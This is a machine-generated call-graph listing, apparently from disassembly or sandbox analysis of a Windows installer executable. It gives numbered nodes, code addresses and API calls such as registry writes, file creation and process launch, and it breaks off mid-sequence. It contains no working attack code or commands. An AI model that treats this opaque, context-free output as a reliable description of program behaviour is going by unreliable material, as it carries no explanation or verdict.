4573 402116 MulDiv 4572->4573 4574 401446 18 API calls 4573->4574 4575 40212c 4574->4575 4576 406831 18 API calls 4575->4576 4577 402165 CreateFontIndirectW 4576->4577 4578 4030dc 4577->4578 4579 4030e3 4578->4579 4581 405f7d wsprintfW 4578->4581 4581->4579 4582 4024fb 4583 40145c 18 API calls 4582->4583 4584 402502 4583->4584 4585 40145c 18 API calls 4584->4585 4586 40250c 4585->4586 4587 40145c 18 API calls 4586->4587 4588 402515 4587->4588 4589 40145c 18 API calls 4588->4589 4590 40251f 4589->4590 4591 40145c 18 API calls 4590->4591 4592 402529 4591->4592 4593 40253d 4592->4593 4594 40145c 18 API calls 4592->4594 4595 4062cf 11 API calls 4593->4595 4594->4593 4596 40256a CoCreateInstance 4595->4596 4597 40258c 4596->4597 4598 4026fc 4600 402708 4598->4600 4601 401ee4 4598->4601 4599 406831 18 API calls 4599->4601 4601->4598 4601->4599 3692 4019fd 3693 40145c 18 API calls 3692->3693 3694 401a04 3693->3694 3697 405eab 3694->3697 3698 405eb8 GetTickCount GetTempFileNameW 3697->3698 3699 401a0b 3698->3699 3700 405eee 3698->3700 3700->3698 3700->3699 4602 4022fd 4603 40145c 18 API calls 4602->4603 4604 402304 GetFileVersionInfoSizeW 4603->4604 4605 4030e3 4604->4605 4606 40232b GlobalAlloc 4604->4606 4606->4605 4607 40233f GetFileVersionInfoW 4606->4607 4608 402350 VerQueryValueW 4607->4608 4609 402381 GlobalFree 4607->4609 4608->4609 4610 402369 4608->4610 4609->4605 4615 405f7d wsprintfW 4610->4615 4613 402375 4616 405f7d wsprintfW 4613->4616 4615->4613 4616->4609 4617 402afd 4618 40145c 18 API calls 4617->4618 4619 402b04 4618->4619 4624 405e7c GetFileAttributesW CreateFileW 4619->4624 4621 402b10 4622 4030e3 4621->4622 4625 405f7d wsprintfW 4621->4625 4624->4621 4625->4622 4626 4029ff 4627 401553 19 API calls 4626->4627 4628 402a09 4627->4628 4629 40145c 18 API calls 4628->4629 4630 402a12 4629->4630 4631 402a1f RegQueryValueExW 4630->4631 4636 401a13 4630->4636 4632 402a45 4631->4632 4633 402a3f 4631->4633 4634 4029e4 RegCloseKey 4632->4634 4632->4636 4633->4632 4637 405f7d wsprintfW 4633->4637 4634->4636 4637->4632 3440 402880 3441 402884 3440->3441 3442 40145c 18 API calls 3441->3442 3443 4028a7 3442->3443 3444 40145c 18 API calls 3443->3444 3445 4028b1 3444->3445 3446 4028ba RegCreateKeyExW 3445->3446 3447 4028e8 3446->3447 3452 4029ef 3446->3452 3448 40145c 18 API calls 3447->3448 3464 402934 3447->3464 3451 4028fc lstrlenW 3448->3451 3450 4029ae RegSetValueExW 3453 4029cb 3450->3453 3465 4029c6 RegCloseKey 3450->3465 3456 402918 3451->3456 3457 40292a 3451->3457 3459 4062cf 11 API calls 3453->3459 3454 402947 3460 4062cf 11 API calls 3454->3460 3462 4062cf 11 API calls 3456->3462 3458 4062cf 11 API calls 3457->3458 3458->3464 3459->3465 3467 402963 3460->3467 3463 402922 3462->3463 3463->3450 3464->3467 3471 401446 3464->3471 3465->3452 3467->3450 3474 40337f 3467->3474 3470 4062cf 11 API calls 3470->3463 3472 406831 18 API calls 3471->3472 3473 401455 3472->3473 3473->3454 3475 40339a 3474->3475 3476 4033c7 3475->3476 3502 403368 SetFilePointer 3475->3502 3500 403336 ReadFile 3476->3500 3480 40297b 3494 406250 3480->3494 3481 403546 3483 40354a 3481->3483 3484 40356e 3481->3484 3482 4033eb GetTickCount 3482->3480 3487 403438 3482->3487 3485 403336 ReadFile 3483->3485 3484->3480 3488 403336 ReadFile 3484->3488 3489 40358d WriteFile 3484->3489 3485->3480 3486 403336 ReadFile 3486->3487 3487->3480 3487->3486 3490 40348a GetTickCount 3487->3490 3491 4034af MulDiv wsprintfW 3487->3491 3493 4034f3 WriteFile 3487->3493 3488->3484 3489->3480 3489->3484 3490->3487 3492 404f9e 25 API calls 3491->3492 3492->3487 3493->3480 3493->3487 3495 406273 3494->3495 3496 4062b6 3495->3496 3497 406288 wsprintfW 3495->3497 3498 402991 3496->3498 3499 4062bf lstrcatW 3496->3499 3497->3496 3497->3497 3498->3470 3499->3498 3501 403357 3500->3501 3501->3480 3501->3481 3501->3482 3502->3476 4638 401000 4639 401037 BeginPaint GetClientRect 4638->4639 4640 40100c DefWindowProcW 4638->4640 4642 4010fc 4639->4642 4643 401182 4640->4643 4644 401073 CreateBrushIndirect FillRect DeleteObject 4642->4644 4645 401105 4642->4645 4644->4642 4646 401170 EndPaint 4645->4646 4647 40110b CreateFontIndirectW 4645->4647 4646->4643 4647->4646 4648 40111b 6 API calls 4647->4648 4648->4646 4649 401f80 4650 401446 18 API calls 4649->4650 4651 401f88 4650->4651 4652 401446 18 API calls 4651->4652 4653 401f93 4652->4653 4654 401fa3 4653->4654 4655 40145c 18 API calls 4653->4655 4656 401fb3 4654->4656 4657 40145c 18 API calls 4654->4657 4655->4654 4658 402006 4656->4658 4659 401fbc 4656->4659 4657->4656 4660 40145c 18 API calls 4658->4660 4661 401446 18 API calls 4659->4661 4662 40200d 4660->4662 4663 401fc4 4661->4663 4664 40145c 18 API calls 4662->4664 4665 401446 18 API calls 4663->4665 4666 402016 FindWindowExW 4664->4666 4667 401fce 4665->4667 4671 402036 4666->4671 4668 401ff6 SendMessageW 4667->4668 4669 401fd8 SendMessageTimeoutW 4667->4669 4668->4671 4669->4671 4670 4030e3 4671->4670 4673 405f7d wsprintfW 4671->4673 4673->4670 4674 403d02 4675 403d0d 4674->4675 4676 403d11 4675->4676 4677 403d14 GlobalAlloc 4675->4677 4677->4676 4678 402082 4679 401446 18 API calls 4678->4679 4680 402093 SetWindowLongW 4679->4680 4681 4030e3 4680->4681 4682 402a84 4683 401553 19 API calls 4682->4683 4684 402a8e 4683->4684 4685 401446 18 API calls 4684->4685 4686 402a98 4685->4686 4687 401a13 4686->4687 4688 402ab2 RegEnumKeyW 4686->4688 4689 402abe RegEnumValueW 4686->4689 4690 402a7e 4688->4690 4689->4687 4689->4690 4690->4687 4691 4029e4 RegCloseKey 4690->4691 4691->4687 4692 402c8a 4693 402ca2 4692->4693 4694 402c8f 4692->4694 4696 40145c 18 API calls 4693->4696 4695 401446 18 API calls 4694->4695 4698 402c97 4695->4698 4697 402ca9 lstrlenW 4696->4697 4697->4698 4699 401a13 4698->4699 4700 402ccb WriteFile 4698->4700 4700->4699 4701 401d8e 4702 40145c 18 API calls 4701->4702 4703 401d95 ExpandEnvironmentStringsW 4702->4703 4704 401da8 4703->4704 4705 401db9 4703->4705 4704->4705 4706 401dad lstrcmpW 4704->4706 4706->4705 4707 401e0f 4708 401446 18 API calls 4707->4708 4709 401e17 4708->4709 4710 401446 18 API calls 4709->4710 4711 401e21 4710->4711 4712 4030e3 4711->4712 4714 405f7d wsprintfW 4711->4714 4714->4712 4715 40438f 4716 4043c8 4715->4716 4717 40439f 4715->4717 4718 403df6 8 API calls 4716->4718 4719 403d6b 19 API calls 4717->4719 4721 4043d4 4718->4721 4720 4043ac SetDlgItemTextW 4719->4720 4720->4716 4722 403f90 4723 403fa0 4722->4723 4724 403fbc 4722->4724 4733 405cb0 GetDlgItemTextW 4723->4733 4726 403fc2 SHGetPathFromIDListW 4724->4726 4727 403fef 4724->4727 4729 403fd2 4726->4729 4732 403fd9 SendMessageW 4726->4732 4728 403fad SendMessageW 4728->4724 4730 40141d 80 API calls 4729->4730 4730->4732 4732->4727 4733->4728 4734 402392 4735 40145c 18 API calls 4734->4735 4736 402399 4735->4736 4739 407224 4736->4739 4740 406efe 25 API calls 4739->4740 4741 407244 4740->4741 4742 4023a7 4741->4742 4743 40724e lstrcpynW lstrcmpW 4741->4743 4744 407280 4743->4744 4745 407286 lstrcpynW 4743->4745 4744->4745 4745->4742 4746 402713 4761 406035 lstrcpynW 4746->4761 4748 40272c 4762 406035 lstrcpynW 4748->4762 4750 402738 4751 402743 4750->4751 4752 40145c 18 API calls 4750->4752 4753 40145c 18 API calls 4751->4753 4754 402752 4751->4754 4752->4751 4753->4754 4756 40145c 18 API calls 4754->4756 4758 402761 4754->4758 4755 40145c 18 API calls 4757 40276b 4755->4757 4756->4758 4759 4062cf 11 API calls 4757->4759 4758->4755 4760 40277f WritePrivateProfileStringW 4759->4760 4761->4748 4762->4750 4763 402797 4764 40145c 18 API calls 4763->4764 4765 4027ae 4764->4765 4766 40145c 18 API calls 4765->4766 4767 4027b7 4766->4767 4768 40145c 18 API calls 4767->4768 4769 4027c0 GetPrivateProfileStringW lstrcmpW 4768->4769 4770 401e9a 4771 40145c 18 API calls 4770->4771 4772 401ea1 4771->4772 4773 401446 18 API calls 4772->4773 4774 401eab wsprintfW 4773->4774 3701 401a1f 3702 40145c 18 API calls 3701->3702 3703 401a26 3702->3703 3704 4062cf 11 API calls 3703->3704 3705 401a49 3704->3705 3706 401a64 3705->3706 3707 401a5c 3705->3707 3755 406035 lstrcpynW 3706->3755 3754 406035 lstrcpynW 3707->3754 3710 401a6f 3712 40674e 3 API calls 3710->3712 3711 401a62 3714 406064 5 API calls 3711->3714 3713 401a75 lstrcatW 3712->3713 3713->3711 3745 401a81 3714->3745 3715 406301 2 API calls 3715->3745 3717 405e5c 2 API calls 3717->3745 3718 401a98 CompareFileTime 3718->3745 3719 401ba9 3720 404f9e 25 API calls 3719->3720 3722 401bb3 3720->3722 3721 401b5d 3723 404f9e 25 API calls 3721->3723 3724 40337f 33 API calls 3722->3724 3725 401b70 3723->3725 3726 401bc6 3724->3726 3729 4062cf 11 API calls 3725->3729 3728 4062cf 11 API calls 3726->3728 3727 406035 lstrcpynW 3727->3745 3730 401bda 3728->3730 3735 401b8b 3729->3735 3731 401be9 SetFileTime 3730->3731 3732 401bf8 CloseHandle 3730->3732 3731->3732 3734 401c09 3732->3734 3732->3735 3733 406831 18 API calls 3733->3745 3736 401c21 3734->3736 3737 401c0e 3734->3737 3738 406831 18 API calls 3736->3738 3739 406831 18 API calls 3737->3739 3740 401c29 3738->3740 3742 401c16 lstrcatW 3739->3742 3743 4062cf 11 API calls 3740->3743 3742->3740 3746 401c34 3743->3746 3744 401b50 3748 401b93 3744->3748 3749 401b53 3744->3749 3745->3715 3745->3717 3745->3718 3745->3719 3745->3721 3745->3727 3745->3733 3745->3744 3747 4062cf 11 API calls 3745->3747 3753 405e7c GetFileAttributesW CreateFileW 3745->3753 3756 405ccc 3745->3756 3750 405ccc MessageBoxIndirectW 3746->3750 3747->3745 3751 4062cf 11 API calls 3748->3751 3752 4062cf 11 API calls 3749->3752 3750->3735 3751->3735 3752->3721 3753->3745 3754->3711 3755->3710 3757 405ce1 3756->3757 3758 405d2f 3757->3758 3759 405cf7 MessageBoxIndirectW 3757->3759 3758->3745 3759->3758 4775 40209f GetDlgItem GetClientRect 4776 40145c 18 API calls 4775->4776 4777 4020cf LoadImageW SendMessageW 4776->4777 4778 4030e3 4777->4778 4779 4020ed DeleteObject 4777->4779 4779->4778 4780 402b9f 4781 401446 18 API calls 4780->4781 4785 402ba7 4781->4785 4782 402c4a 4783 402bdf ReadFile 4783->4785 4792 402c3d 4783->4792 4784 401446 18 API calls 4784->4792 4785->4782 4785->4783 4786 402c06 MultiByteToWideChar 4785->4786 4787 402c3f 4785->4787 4788 402c4f 4785->4788 4785->4792 4786->4785 4786->4788 4793 405f7d wsprintfW 4787->4793 4790 402c6b SetFilePointer 4788->4790 4788->4792 4790->4792 4791 402d17 ReadFile 4791->4792 4792->4782 4792->4784 4792->4791 4793->4782 4794 402b23 GlobalAlloc 4795 402b39 4794->4795 4796 402b4b 4794->4796 4797 401446 18 API calls 4795->4797 4798 40145c 18 API calls 4796->4798 4800 402b41 4797->4800 4799 402b52 WideCharToMultiByte lstrlenA 4798->4799 4799->4800 4801 402b84 WriteFile 4800->4801 4803 402b93 4800->4803 4802 402384 GlobalFree 4801->4802 4801->4803 4802->4803 4805 4040a3 4806 4040b0 lstrcpynW lstrlenW 4805->4806 4807 4040ad 4805->4807 4807->4806 4808 4054a5 4809 4055f9 4808->4809 4810 4054bd 4808->4810 4812 40564a 4809->4812 4813 40560a GetDlgItem GetDlgItem 4809->4813 4810->4809 4811 4054c9 4810->4811 4815 4054d4 SetWindowPos 4811->4815 4816 4054e7 4811->4816 4814 4056a4 4812->4814 4822 40139d 80 API calls 4812->4822 4817 403d6b 19 API calls 4813->4817 4818 403ddb SendMessageW 4814->4818 4823 4055f4 4814->4823 4815->4816 4819 405504 4816->4819 4820 4054ec ShowWindow 4816->4820 4821 405634 SetClassLongW 4817->4821 4846 4056b6 4818->4846 4824 405526 4819->4824 4825 40550c DestroyWindow 4819->4825 4820->4819 4826 40141d 80 API calls 4821->4826 4829 40567c 4822->4829 4827 40552b SetWindowLongW 4824->4827 4828 40553c 4824->4828 4830 405908 4825->4830 4826->4812 4827->4823 4831 4055b3 4828->4831 4832 405548 GetDlgItem 4828->4832 4829->4814 4833 405680 SendMessageW 4829->4833 4830->4823 4839 405939 ShowWindow 4830->4839 4838 403df6 8 API calls 4831->4838 4836 405578 4832->4836 4837 40555b SendMessageW IsWindowEnabled 4832->4837 4833->4823 4834 40141d 80 API calls 4834->4846 4835 40590a DestroyWindow EndDialog 4835->4830 4841 405585 4836->4841 4844 4055cc SendMessageW 4836->4844 4845 405598 4836->4845 4851 40557d 4836->4851 4837->4823 4837->4836 4838->4823 4839->4823 4840 406831 18 API calls 4840->4846 4841->4844 4841->4851 4842 403d44 SendMessageW 4842->4831 4843 403d6b 19 API calls 4843->4846 4844->4831 4847 4055a0 4845->4847 4848 4055b5 4845->4848 4846->4823 4846->4834 4846->4835 4846->4840 4846->4843 4852 403d6b 19 API calls 4846->4852 4867 40584a DestroyWindow 4846->4867 4850 40141d 80 API calls 4847->4850 4849 40141d 80 API calls 4848->4849 4849->4851 4850->4851 4851->4831 4851->4842 4853 405731 GetDlgItem 4852->4853 4854 405746 4853->4854 4855 40574f ShowWindow EnableWindow 4853->4855 4854->4855 4876 403db1 EnableWindow 4855->4876 4857 405779 EnableWindow 4860 40578d 4857->4860 4858 405792 GetSystemMenu EnableMenuItem SendMessageW 4859 4057c2 SendMessageW 4858->4859 4858->4860 4859->4860 4860->4858 4877 403dc4 SendMessageW 4860->4877 4878 406035 lstrcpynW 4860->4878 4863 4057f0 lstrlenW 4864 406831 18 API calls 4863->4864 4865 405806 SetWindowTextW 4864->4865 4866 40139d 80 API calls 4865->4866 4866->4846 4867->4830 4868 405864 CreateDialogParamW 4867->4868 4868->4830 4869 405897 4868->4869 4870 403d6b 19 API calls 4869->4870 4871 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4870->4871 4872 40139d 80 API calls 4871->4872 4873 4058e8 4872->4873 4873->4823 4874 4058f0 ShowWindow 4873->4874 4875 403ddb SendMessageW 4874->4875 4875->4830 4876->4857 4877->4860 4878->4863 4879 402da5 4880 4030e3 4879->4880 4881 402dac 4879->4881 4882 401446 18 API calls 4881->4882 4883 402db8 4882->4883 4884 402dbf SetFilePointer 4883->4884 4884->4880 4885 402dcf 4884->4885 4885->4880 4887 405f7d wsprintfW 4885->4887 4887->4880 4888 4049a8 GetDlgItem GetDlgItem 4889 4049fe 7 API calls 4888->4889 4894 404c16 4888->4894 4890 404aa2 DeleteObject 4889->4890 4891 404a96 SendMessageW 4889->4891 4892 404aad 4890->4892 4891->4890 4895 404ae4 4892->4895 4898 406831 18 API calls 4892->4898 4893 404cfb 4896 404da0 4893->4896 4897 404c09 4893->4897 4902 404d4a SendMessageW 4893->4902 4894->4893 4906 40487a 5 API calls 4894->4906 4919 404c86 4894->4919 4901 403d6b 19 API calls 4895->4901 4899 404db5 4896->4899 4900 404da9 SendMessageW 4896->4900 4903 403df6 8 API calls 4897->4903 4904 404ac6 SendMessageW SendMessageW 4898->4904 4911 404dc7 ImageList_Destroy 4899->4911 4912 404dce 4899->4912 4917 404dde 4899->4917 4900->4899 4907 404af8 4901->4907 4902->4897 4909 404d5f SendMessageW 4902->4909 4910 404f97 4903->4910 4904->4892 4905 404ced SendMessageW 4905->4893 4906->4919 4913 403d6b 19 API calls 4907->4913 4908 404f48 4908->4897 4918 404f5d ShowWindow GetDlgItem ShowWindow 4908->4918 4914 404d72 4909->4914 4911->4912 4915 404dd7 GlobalFree 4912->4915 4912->4917 4921 404b09 4913->4921 4923 404d83 SendMessageW 4914->4923 4915->4917 4916 404bd6 GetWindowLongW SetWindowLongW 4920 404bf0 4916->4920 4917->4908 4922 40141d 80 API calls 4917->4922 4932 404e10 4917->4932 4918->4897 4919->4893 4919->4905 4924 404bf6 ShowWindow 4920->4924 4925 404c0e 4920->4925 4921->4916 4927 404b65 SendMessageW 4921->4927 4928 404bd0 4921->4928 4930 404b93 SendMessageW 4921->4930 4931 404ba7 SendMessageW 4921->4931 4922->4932 4923->4896 4939 403dc4 SendMessageW 4924->4939 4940 403dc4 SendMessageW 4925->4940 4927->4921 4928->4916 4928->4920 4930->4921 4931->4921 4933 404e54 4932->4933 4936 404e3e SendMessageW 4932->4936 4934 404f1f InvalidateRect 4933->4934 4938 404ecd SendMessageW SendMessageW 4933->4938 4934->4908 4935 404f35 4934->4935 4937 4043d9 21 API calls 4935->4937 4936->4933 4937->4908 4938->4933 4939->4897 4940->4894 4941 4030a9 SendMessageW 4942 4030c2 InvalidateRect 4941->4942 4943 4030e3 4941->4943 4942->4943 3760 4038af #17 SetErrorMode OleInitialize 3761 406328 3 API calls 3760->3761 3762 4038f2 SHGetFileInfoW 3761->3762 3834 406035 lstrcpynW 3762->3834 3764 40391d GetCommandLineW 3835 406035 lstrcpynW 3764->3835 3766 40392f GetModuleHandleW 3767 403947 3766->3767 3768 405d32 CharNextW 3767->3768 3769 403956 CharNextW 3768->3769 3780 403968 3769->3780 3770 403a02 3771 403a21 GetTempPathW 3770->3771 3836 4037f8 3771->3836 3773 403a37 3775 403a3b GetWindowsDirectoryW lstrcatW 3773->3775 3776 403a5f DeleteFileW 3773->3776 3774 405d32 CharNextW 3774->3780 3778 4037f8 11 API calls 3775->3778 3844 4035b3 GetTickCount GetModuleFileNameW 3776->3844 3781 403a57 3778->3781 3779 403a73 3782 403af8 3779->3782 3784 405d32 CharNextW 3779->3784 3820 403add 3779->3820 3780->3770 3780->3774 3787 403a04 3780->3787 3781->3776 3781->3782 3930 403885 3782->3930 3788 403a8a 3784->3788 3937 406035 lstrcpynW 3787->3937 3799 403b23 lstrcatW lstrcmpiW 3788->3799 3800 403ab5 3788->3800 3790 403bfa 3793 403c7d 3790->3793 3795 406328 3 API calls 3790->3795 3791 403b0d 3794 405ccc MessageBoxIndirectW 3791->3794 3792 406113 9 API calls 3792->3782 3796 403b1b ExitProcess 3794->3796 3798 403c09 3795->3798 3802 406328 3 API calls 3798->3802 3799->3782 3801 403b3f CreateDirectoryW SetCurrentDirectoryW 3799->3801 3803 4067aa 18 API calls 3800->3803 3804 403b62 3801->3804 3805 403b57 3801->3805 3806 403c12 3802->3806 3807 403ac3 3803->3807 3941 406035 lstrcpynW 3804->3941 3940 406035 lstrcpynW 3805->3940 3810 406328 3 API calls 3806->3810 3807->3782 3938 406035 lstrcpynW 3807->3938 3813 403c1b 3810->3813 3812 403b70 3942 406035 lstrcpynW 3812->3942 3814 403c69 ExitWindowsEx 3813->3814 3819 403c29 GetCurrentProcess 3813->3819 3814->3793 3818 403c76 3814->3818 3815 403ad2 3939 406035 lstrcpynW 3815->3939 3946 40141d 3818->3946 3823 403c39 3819->3823 3872 405958 3820->3872 3822 406831 18 API calls 3824 403b98 DeleteFileW 3822->3824 3823->3814 3825 403ba5 CopyFileW 3824->3825 3831 403b7f 3824->3831 3825->3831 3826 403bee 3827 406c94 42 API calls 3826->3827 3829 403bf5 3827->3829 3828 406c94 42 API calls 3828->3831 3829->3782 3830 406831 18 API calls 3830->3831 3831->3822 3831->3826 3831->3828 3831->3830 3833 403bd9 CloseHandle 3831->3833 3943 405c6b CreateProcessW 3831->3943 3833->3831 3834->3764 3835->3766 3837 406064 5 API calls 3836->3837 3838 403804 3837->3838 3839 40380e 3838->3839 3840 40674e 3 API calls 3838->3840 3839->3773 3841 403816 CreateDirectoryW 3840->3841 3842 405eab 2 API calls 3841->3842 3843 40382a 3842->3843 3843->3773 3949 405e7c GetFileAttributesW CreateFileW 3844->3949 3846 4035f3 3866 403603 3846->3866 3950 406035 lstrcpynW 3846->3950 3848 403619 3849 40677d 2 API calls 3848->3849 3850 40361f 3849->3850 3951 406035 lstrcpynW 3850->3951 3852 40362a GetFileSize 3853 403726 3852->3853 3867 403641 3852->3867 3952 4032d2 3853->3952 3855 40372f 3857 40376b GlobalAlloc 3855->3857 3855->3866 3963 403368 SetFilePointer 3855->3963 3856 403336 ReadFile 3856->3867 3964 403368 SetFilePointer 3857->3964 3860 4037e9 3863 4032d2 6 API calls 3860->3863 3861 403786 3864 40337f 33 API calls 3861->3864 3862 40374c 3865 403336 ReadFile 3862->3865 3863->3866 3870 403792 3864->3870 3869 403757 3865->3869 3866->3779 3867->3853 3867->3856 3867->3860 3867->3866 3868 4032d2 6 API calls 3867->3868 3868->3867 3869->3857 3869->3866 3870->3866 3870->3870 3871 4037c0 SetFilePointer 3870->3871 3871->3866 3873 406328 3 API calls 3872->3873 3874 40596c 3873->3874 3875 405972 3874->3875 3876 405984 3874->3876 3978 405f7d wsprintfW 3875->3978 3877 405eff 3 API calls 3876->3877 3878 4059b5 3877->3878 3880 4059d4 lstrcatW 3878->3880 3882 405eff 3 API calls 3878->3882 3881 405982 3880->3881 3969 403ec1 3881->3969 3882->3880 3885 4067aa 18 API calls 3886 405a06 3885->3886 3887 405a9c 3886->3887 3889 405eff 3 API calls 3886->3889 3888 4067aa 18 API calls 3887->3888 3890 405aa2 3888->3890 3891 405a38 3889->3891 3892 405ab2 3890->3892 3893 406831 18 API calls 3890->3893 3891->3887 3895 405a5b lstrlenW 3891->3895 3898 405d32 CharNextW 3891->3898 3894 405ad2 LoadImageW 3892->3894 3980 403ea0 3892->3980 3893->3892 3896 405b92 3894->3896 3897 405afd RegisterClassW 3894->3897 3899 405a69 lstrcmpiW 3895->3899 3900 405a8f 3895->3900 3904 40141d 80 API calls 3896->3904 3902 403aed 3897->3902 3903 405b45 SystemParametersInfoW CreateWindowExW 3897->3903 3905 405a56 3898->3905 3899->3900 3906 405a79 GetFileAttributesW 3899->3906 3908 40674e 3 API calls 3900->3908 3902->3792 3903->3896 3909 405b98 3904->3909 3905->3895 3910 405a85 3906->3910 3907 405ac8 3907->3894 3911 405a95 3908->3911 3909->3902 3912 403ec1 19 API calls 3909->3912 3910->3900 3913 40677d 2 API calls 3910->3913 3979 406035 lstrcpynW 3911->3979 3915 405ba9 3912->3915 3913->3900 3916 405bb5 ShowWindow LoadLibraryW 3915->3916 3917 405c38 3915->3917 3918 405bd4 LoadLibraryW 3916->3918 3919 405bdb GetClassInfoW 3916->3919 3985 405073 OleInitialize 3917->3985 3918->3919 3921 405c05 DialogBoxParamW 3919->3921 3922 405bef GetClassInfoW RegisterClassW 3919->3922 3926 40141d 80 API calls 3921->3926 3922->3921 3923 405c3e 3924 405c42 3923->3924 3925 405c5a 3923->3925 3924->3902 3929 40141d 80 API calls 3924->3929 3927 40141d 80 API calls 3925->3927 3928 405c2d 3926->3928 3927->3902 3928->3902 3929->3902 3931 40389d 3930->3931 3932 40388f CloseHandle 3930->3932 4114 403caf 3931->4114 3932->3931 3935 406cc7 81 API calls 3936 4038ae CoUninitialize 3935->3936 3936->3790 3936->3791 3937->3771 3938->3815 3939->3820 3940->3804 3941->3812 3942->3831 3944 405ca6 3943->3944 3945 405c9a CloseHandle 3943->3945 3944->3831 3945->3944 3947 40139d 80 API calls 3946->3947 3948 401432 3947->3948 3948->3793 3949->3846 3950->3848 3951->3852 3953 4032f3 3952->3953 3954 4032db 3952->3954 3957 403303 GetTickCount 3953->3957 3958 4032fb 3953->3958 3955 4032e4 DestroyWindow 3954->3955 3956 4032eb 3954->3956 3955->3956 3956->3855 3960 403311 CreateDialogParamW ShowWindow 3957->3960 3961 403334 3957->3961 3965 40635e 3958->3965 3960->3961 3961->3855 3963->3862 3964->3861 3966 40637b PeekMessageW 3965->3966 3967 406371 DispatchMessageW 3966->3967 3968 403301 3966->3968 3967->3966 3968->3855 3970 403ed5 3969->3970 3993 405f7d wsprintfW 3970->3993 3972 403f49 3973 406831 18 API calls 3972->3973 3974 403f55 SetWindowTextW 3973->3974 3975 403f70 3974->3975 3976 403f8b 3975->3976 3977 406831 18 API calls 3975->3977 3976->3885 3977->3975 3978->3881 3979->3887 3994 406035 lstrcpynW 3980->3994 3982 403eb4 3983 40674e 3 API calls 3982->3983 3984 403eba lstrcatW 3983->3984 3984->3907 3995 403ddb 3985->3995 3987 403ddb SendMessageW 3988 4050d1 OleUninitialize 3987->3988 3988->3923 3989 4062cf 11 API calls 3990 405096 3989->3990 3990->3989 3992 4050c1 3990->3992 3998 40139d 3990->3998 3992->3987 3993->3972 3994->3982 3996 403df3 3995->3996 3997 403de4 SendMessageW 3995->3997 3996->3990 3997->3996 4001 4013a4 3998->4001 3999 401410 3999->3990 4001->3999 4002 4013dd MulDiv SendMessageW 4001->4002 4003 4015a0 4001->4003 4002->4001 4004 4015fa 4003->4004 4084 40160c 4003->4084 4005 401601 4004->4005 4006 401742 4004->4006 4007 401962 4004->4007 4008 4019ca 4004->4008 4009 40176e 4004->4009 4010 401650 4004->4010 4011 4017b1 4004->4011 4012 401672 4004->4012 4013 401693 4004->4013 4014 401616 4004->4014 4015 4016d6 4004->4015 4016 401736 4004->4016 4017 401897 4004->4017 4018 4018db 4004->4018 4019 40163c 4004->4019 4020 4016bd 4004->4020 4004->4084 4029 4062cf 11 API calls 4005->4029 4021 401751 ShowWindow 4006->4021 4022 401758 4006->4022 4026 40145c 18 API calls 4007->4026 4033 40145c 18 API calls 4008->4033 4023 40145c 18 API calls 4009->4023 4047 4062cf 11 API calls 4010->4047 4027 40145c 18 API calls 4011->4027 4024 40145c 18 API calls 4012->4024 4028 401446 18 API calls 4013->4028 4032 40145c 18 API calls 4014->4032 4046 401446 18 API calls 4015->4046 4015->4084 4016->4084 4113 405f7d wsprintfW 4016->4113 4025 40145c 18 API calls 4017->4025 4030 40145c 18 API calls 4018->4030 4034 401647 PostQuitMessage 4019->4034 4019->4084 4031 4062cf 11 API calls 4020->4031 4021->4022 4035 401765 ShowWindow 4022->4035 4022->4084 4036 401775 4023->4036 4037 401678 4024->4037 4038 40189d 4025->4038 4039 401968 GetFullPathNameW 4026->4039 4040 4017b8 4027->4040 4041 40169a 4028->4041 4029->4084 4042 4018e2 4030->4042 4043 4016c7 SetForegroundWindow 4031->4043 4044 40161c 4032->4044 4045 4019d1 SearchPathW 4033->4045 4034->4084 4035->4084 4049 4062cf 11 API calls 4036->4049 4050 4062cf 11 API calls 4037->4050 4051 406301 2 API calls 4038->4051 4052 4019a1 4039->4052 4053 40197f 4039->4053 4054 4062cf 11 API calls 4040->4054 4055 4062cf 11 API calls 4041->4055 4056 40145c 18 API calls 4042->4056 4043->4084 4057 4062cf 11 API calls 4044->4057 4045->4016 4045->4084 4046->4084 4058 401664 4047->4058 4059 401785 SetFileAttributesW 4049->4059 4060 401683 4050->4060 4061 4018a5 4051->4061 4073 4019b8 GetShortPathNameW 4052->4073 4052->4084 4053->4052 4079 406301 2 API calls 4053->4079 4062 4017c9 4054->4062 4063 4016a7 4055->4063 4064 4018eb 4056->4064 4065 401627 4057->4065 4066 40139d 65 API calls 4058->4066 4067 40179a 4059->4067 4059->4084 4077 404f9e 25 API calls 4060->4077 4068 4018c2 4061->4068 4069 4018a9 4061->4069 4070 405d85 4 API calls 4062->4070 4071 4016b1 Sleep 4063->4071 4072 4016ae 4063->4072 4074 40145c 18 API calls 4064->4074 4075 404f9e 25 API calls 4065->4075 4066->4084 4076 4062cf 11 API calls 4067->4076 4080 4062cf 11 API calls 4068->4080 4078 4062cf 11 API calls 4069->4078 4081 4017d4 4070->4081 4071->4084 4072->4071 4073->4084 4082 4018f5 4074->4082 4075->4084 4076->4084 4077->4084 4078->4084 4083 401991 4079->4083 4080->4084 4085 401864 4081->4085 4088 405d32 CharNextW 4081->4088 4106 4062cf 11 API calls 4081->4106 4086 4062cf 11 API calls 4082->4086 4083->4052 4112 406035 lstrcpynW 4083->4112 4084->4001 4085->4060 4087 40186e 4085->4087 4089 401902 MoveFileW 4086->4089 4090 404f9e 25 API calls 4087->4090 4092 4017e6 CreateDirectoryW 4088->4092 4093 401912 4089->4093 4094 40191e 4089->4094 4095 401875 4090->4095 4092->4081 4096 4017fe GetLastError 4092->4096 4093->4060 4100 406301 2 API calls 4094->4100 4110 401942 4094->4110 4111 406035 lstrcpynW 4095->4111 4098 401827 GetFileAttributesW 4096->4098 4099 40180b GetLastError 4096->4099 4098->4081 4103 4062cf 11 API calls 4099->4103 4104 401929 4100->4104 4101 401882 SetCurrentDirectoryW 4101->4084 4102 4062cf 11 API calls 4105 40195c 4102->4105 4103->4081 4107 406c94 42 API calls 4104->4107 4104->4110 4105->4084 4106->4081 4108 401936 4107->4108 4109 404f9e 25 API calls 4108->4109 4109->4110 4110->4102 4111->4101 4112->4052 4113->4084 4115 403cbd 4114->4115 4116 4038a2 4115->4116 4117 403cc2 FreeLibrary GlobalFree 4115->4117 4116->3935 4117->4116 4117->4117 3503 401cb2 3504 40145c 18 API calls 3503->3504 3505 401c54 3504->3505 3506 4062cf 11 API calls 3505->3506 3509 401c64 3505->3509 3507 401c59 3506->3507 3510 406cc7 3507->3510 3556 4067aa 3510->3556 3513 406ce3 DeleteFileW 3552 406eda 3513->3552 3514 406cfa 3517 406e67 3514->3517 3570 406035 lstrcpynW 3514->3570 3516 406d25 3518 406d39 3516->3518 3519 